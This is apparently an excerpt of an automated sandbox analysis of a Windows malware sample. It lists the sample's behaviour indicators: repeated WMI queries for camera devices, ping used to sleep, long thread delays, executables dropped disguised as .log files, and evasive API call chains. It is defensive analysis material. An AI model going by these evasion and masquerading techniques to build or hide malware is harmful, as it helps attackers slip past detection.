Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\webCrt\Surrogatedll.exe	Memory allocated: 1600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Memory allocated: 1B400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\webCrt\Surrogatedll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599866	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599747	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597606	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597333	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597214	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594665	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 593938	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Recovery\EeMFgDHDyZvTl.exe	Window / User API: threadDelayed 1510			Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Window / User API: threadDelayed 8259			Jump to behavior

Source: C:\webCrt\Surrogatedll.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nukLNhSq.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RyxhNllI.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rrFUvAHK.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hACmhobX.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KCOiojdz.log	Jump to dropped file
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IPdRdIgb.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eMRvdFMJ.log	Jump to dropped file
Source: C:\webCrt\Surrogatedll.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DWhAaqcM.log	Jump to dropped file

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23488

Source: C:\webCrt\Surrogatedll.exe TID: 6640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3796	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599866s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599747s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599640s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598951s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598829s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598579s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 5608	Thread sleep time: -7200000s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597968s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597606s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597333s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597214s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -597101s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596407s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596282s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595954s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595829s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595704s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595579s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594954s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594829s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594665s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594296s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe TID: 3040	Thread sleep time: -593938s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\webCrt\Surrogatedll.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0022A69B
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0023C220
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0024B348 FindFirstFileExA,	0_2_0024B348

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe

Code function: 0_2_0023E6A3 VirtualQuery,GetSystemInfo,

0_2_0023E6A3

Source: C:\webCrt\Surrogatedll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599866	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599747	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Thread delayed: delay time: 597719	Jump to behavior
